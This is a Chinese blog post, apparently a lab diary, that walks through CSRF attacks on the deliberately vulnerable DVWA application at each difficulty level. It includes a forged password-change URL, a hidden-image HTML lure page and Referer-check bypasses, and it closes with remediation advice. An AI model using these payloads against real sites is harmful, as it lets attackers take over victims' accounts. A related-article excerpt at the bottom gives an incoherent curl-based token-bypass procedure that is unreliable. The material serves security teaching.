DVWA学习日记-3 CSRF

最新推荐文章于 2024-06-27 18:17:03 发布
最新推荐文章于 2024-06-27 18:17:03 发布
阅读量177 收藏
点赞数
分类专栏: DVWA 文章标签: CSRF 跨站请求伪造 web漏洞 DVWA
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29010757/article/details/84230350
版权

CSRF

1.概述
例如说手机上收到一条短信,点了一下,发现里面什么都没有,过了一活儿,银行短信来了,发现自己的钱不见了,这就是黑客利用CSRF漏洞造成的。

1.2.概念
CSRF
cross-site request forgery
跨站   请求  伪造

受害者角度
用户在当前已登录的WEB应用程序上执行非本意的操作

攻击者角度
攻击者欺骗浏览器,让其以受害者的名义执行自己想要的操作

准备
Firefox
DVWA

2.漏洞实战
1.打开环境DVWA设置简单
修改密码
在这里插入图片描述
2.再去看源代码
发现只检测了检查参数pass_new与pass_conf是否相同,就可以修改密码
在这里插入图片描述
3.我们只要构建链接让用户登陆网站且该用户有cookie登陆,这里用自己的路径填写
http://192.168.48.39/DVWA-master/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#

当用户点击该链接,密码就会修改为12345
4.我们去搭建一个钓鱼网站诱使用户点击该站点修改密码

<head>
</head>
<body>
	good image
	</br>
	<img src="http://192.168.48.39/DVWA-master/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#>" width=0 height=0 border=0 />hi,this is funny</a>
		</tr>
		<br />
	this is a demo!
</body>

当上当用户点击我们的网站,则成功修改密码

5.进入中级难度
查看源代码
在这里插入图片描述
我们发现中等难度源代码中使用函数stripos,查找php在字符串第一次出现的位置(不区分大小写),查找包头中Referer的来源地址是否是包头中HOST的字符串,不是为false则执行下面

这时要实现CSRF攻击,需要有2个条件:
1.获得cookie值
2.通过服务器程序检查
所以我们就要会绕过
或者是抓包将Referer改为带有host内容就能绕过检测(csrf.html是我们自己的钓鱼网站)
http://192.168.48.39:80/192.168.48.40/csrf.html
或者是将(csrf网站)名字改成host
http://192.168.48.39/192.168.48.40.html

6.接着进入高难度等级
发现hight多了user_token字段
在这里插入图片描述
在这里插入图片描述
显然我们无法再直接利用,如果该网站有XSS漏洞获取页面中user_token参数
也就可以进行CSRF攻击
我们称这种类型的随机参数为csrf token,他保证了攻击者无法猜测到所有参数

为什么暴力破解可以突破CSRF Token?
因为构造HTTP请求的人不一样
暴力破解的攻击者是当前用户,受害者是其他用户,知道上一个响应包的内容
而CSRF的攻击者是其他用户,受害者是当前用户,不知道上一个响应表的内容

我们再进入无漏洞难度
确保了输入原始密码,有力防止了CSRF
因为只有当前用户才知道原始密码是什么

3.漏洞修复
校验Referer,在中等难度只校验了Referer,只校验了是否存在host,存在绕过
随机Token
验证码 牺牲了用户体验,防止了漏洞产生

TRRRQ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWACSRF
RexHa的博客
09-30 7388
CSRF跨站请求伪造,通常攻击者会伪造一个场景(例如一条链接),来诱使用户点击,用户一旦点击,黑客的攻击目的也就达到了,他可以盗用你的身份,以你的名义发送恶意请求
DVWA 中等难度
h0ld1rs的博客
08-02 582
文章目录Brute ForceCommand InjectionCSRFFile InclusionFile UploadSQL InjectionSQL Injection (Blind)XSS (Reflected)XSS (Stored) Brute Force 相比较,多了这几行代码 然而多出来的这个函数mysql_real_escape_string( $user )就是对一些特殊字符进行了转义,在low难度下可以利用注释#,将sql语句改写。这里就不能了。这里还是可以利用burp进行强爆破。
手机渗透神器/渗透工具cs-详细白帽子自学路线
最新发布
程序员六七的博客
06-27 332
基础知识Metasploitable:一个刻意制作出来包含漏洞的基于Ubuntu的Linux虚拟机操作系统。DVWA:一个针对Web应用的Web
dvwa靶场之csrf跨站请求伪造)与文件包含
m0_63314341的博客
02-05 2409
csrf跨站请求伪造) 我们先来分析一下源代码 当我们选择更改密码时,我们输入新密码和重复新密码,当新密码和重复的密码一致时将我们的新密码与数据库中的旧密码进行替换即更新数据库 因此我们可以引导该用户点击http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=Change# 其密码就会被我们更改为password_new后面的密码即1234(前提该链接中.
dvwa之sql注入学习(不同级别)
热门推荐
过客璇璇的博客
03-24 4万+
dvwa之sql注入学习(不同级别) 级别:Low 从页面上看到,有一个可以提交查询内容的地方 我们可以通过以下步骤判断这里是否存在注入点 ① 输入1 提交 ②输入1' 提交 ③输入1 and 1=1提交 ④输入1 and 1=2提交 由上可以看出是存在注入点的, 我们猜测sql查询语句是这样的: select First name的列名 a...
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
通过DVWA,开发者或安全研究人员可以实践如何发现这些漏洞,并学习如何修复它们。每个漏洞都有不同的难度级别,适合不同程度的学习者。 SQL-li-labs则专注于SQL注入,这是Web应用程序中最常见且危险的一种安全问题...
DVWA-安装-漏洞测试-漏洞修复指南.docx
05-17
DVWA-安装-漏洞测试-漏洞修复指南-需要安装 xpmpp或WampServer。
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相关资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“中”、“高”和“不可能”,每个级别都包含不同...
DVWA-master.7z 压缩包
09-14
这个"DVWA-master.7z"压缩包包含了完整的DVWA源代码和其他相关文件,用于在本地环境中搭建一个模拟的脆弱Web应用。 为了正确地使用这个压缩包,首先你需要下载它并使用解压缩工具(如7-Zip)将其解压。解压缩后,你...
DVWA-CSRF攻略
真正的大师,永远都怀着一颗学徒的心。
07-28 546
文章目录一、CSRF简介二、LOW三、MediumHigh 一、CSRF简介 跨站请求伪造(Cross Site Request Forgery,CSRF)。 CSRF 是一种攻击,它强制终端用户在当前对其进行身份验证后(登陆 cookie session)的Web 应用程序上执行,非本意操作的攻击。CSRF 攻击的重点在于更改状态的请求,而不是盗取数据,因为攻击者无法查看伪造请求的响应。借助于社工的一些帮助,例如,通过电子邮件或聊天发送链接,攻击者可以诱骗用户执行攻击者选择的操作。如果受害者是普通用户,
【渗透测试】【DVWACSRF
preserphy的博客
08-07 1556
CSRF】 全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。...
DVWA--CSRF(全难度
wwxxee
02-20 1048
DVWACSRF跨站请求伪造) 原理参考:网络安全笔记-99-渗透-CSRF 逻辑 在输入框中输入新密码,可修改当前用户的密码。 难度分级 Low 通过BP抓包,可以发现修改密码的请求是GET方式,直接修改GET请求参数就可以完成密码修改。 只要访问该链接即可修改密码: http://192.168.17.141/DVWA/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change 在BP里
DVWA学习之Burte Force(暴力破解)
weixin_40950781的博客
08-17 578
DVWA学习之Burte ForceBurte Force(暴力破解)Burp Suite 之 Intruder模块0x01 模块功能简介 Burte Force(暴力破解) 暴力破解所采用的方法一般都是枚举法或穷举法,所谓枚举法,简而言之就是把所有的可能性均进行一一列举,并把所有的可能的情况进行验证。若某个情况验证符合题目的所有要求,则该题目存在唯一解,也就是爆破成功;如果所有的可能情况均进行了...
DVWA下载安装
qq_42620328的博客
10-14 1万+
DVWA下载安装
DVWA靶场下载安装(刚入门的小白鼠)
captainLink的博客
06-09 6085
DVWA是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助Web开发者更好的理解web应用安全防范的过程。DVWA共有十个模块,分别是: 1.Brute Force(暴力破解) 2.Command lnjection(命令行注入) 3.CSRF(跨站请求伪造) 4.File lnclusion(文件包含) 5.File Upload(文件上传) 6.lnsecure CAPTCHA(不安全的验证码) 7.SQL
DVWA下载、安装、使用(漏洞测试环境搭建)教程
星如雨落
10-27 4万+
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 一共有十个模块: 暴力(破解)、命令行注入、跨站请求伪造、文件包含、文件上传、不安全的验证码、SQL注入、SQL盲注、弱会话ID、XSS漏洞(DOM型跨站脚本、反射型跨站脚本、 存储型跨站脚本) 环境搭建 由于是本地搭建真实web漏洞网站,我就以Windows
如何使用手机直接渗透测试DVWA(反射性XSS) Attack DVWA XSS(reflected)
PentestSuite
06-26 230
AttacFirst do the preparation as described in Attack DVWA weak session IDs Then come to XSS(reflected) section and try some normal payload. We don’t know what happened here, so come to PentestSuite and check the Javascript code. Find the request in Proxy-M
DVWA网盘下载和安装教程 详解
qq_45705626的博客
07-25 4163
dvwa环境安装
复现关于dvwaCSRF-token绕过实验
05-05
首先,我们需要在本地搭建一个DVWA环境。DVWA是一个漏洞练习平台,可以用于学习和测试Web应用程序的安全性。您可以从以下网站下载DVWA并进行安装:https://github.com/ethicalhack3r/DVWA。 接下来,我们需要绕过CSRF-token进行攻击。CSRF-token是一种防止CSRF攻击的措施,它是一个随机生成的字符串,用于验证请求是否来自合法的来源。在DVWA中,我们可以通过修改一个cookie来绕过CSRF-token。 下面是具体的攻击步骤: 1. 打开DVWA,登录并进入CSRF实验页面。 2. 在Chrome浏览器中打开开发者工具,切换到“Network”选项卡,勾选“Preserve log”选项。 3. 在实验页面中点击“View Source”按钮,查看页面源代码。 4. 在源代码中找到与CSRF-token相关的代码,我们可以看到以下代码: ``` <input type="hidden" name="user_token" value="<?php echo $_SESSION['user_token']; ?>"> ``` 5. 复制CSRF-token,它通常位于name="user_token"的input标签中,value属性的值为一个长字符串。 6. 在开发者工具中找到与此页面对应的请求,点击它打开请求详情。 7. 在请求详情中找到Cookie选项卡,找到名为“PHPSESSID”的cookie并复制它的值。 8. 使用一个新的浏览器标签打开一个在线表单生成器,例如:https://www.123formbuilder.com/free-form-templates/Online-Order-Form-3578911/。 9. 在表单生成器中创建一个POST表单,将请求方法设置为POST,并填写以下表单字段: ``` action: http://your-dvwa-site.com/vulnerabilities/csrf/ amount: 1000 ``` 10. 在开发者工具中找到此页面对应的请求,复制请求头中的所有内容。 11. 使用curl或其他工具发送POST请求,将以上内容作为请求头发送,例如: ``` curl -X POST 'http://your-dvwa-site.com/vulnerabilities/csrf/' \ -H 'Cookie: PHPSESSID=your-session-id-here' \ -H 'Content-Type: application/x-www-form-urlencoded' \ -H 'Referer: http://your-dvwa-site.com/vulnerabilities/csrf/' \ -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36' \ -H 'Upgrade-Insecure-Requests: 1' \ -H 'Origin: http://your-dvwa-site.com' \ -H 'Accept-Encoding: gzip, deflate' \ -H 'Accept-Language: en-US,en;q=0.9' \ -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' \ --data 'user_token=your-csrf-token-here&amount=1000&action=transfer' ``` 12. 您应该会看到成功的响应。 总之,这个实验展示了CSRF攻击的危害性以及如何绕过CSRF-token进行攻击。在实际应用中,我们应该采取更加安全的措施来防止CSRF攻击,例如使用双重身份验证或者更加严格的CSRF-token验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值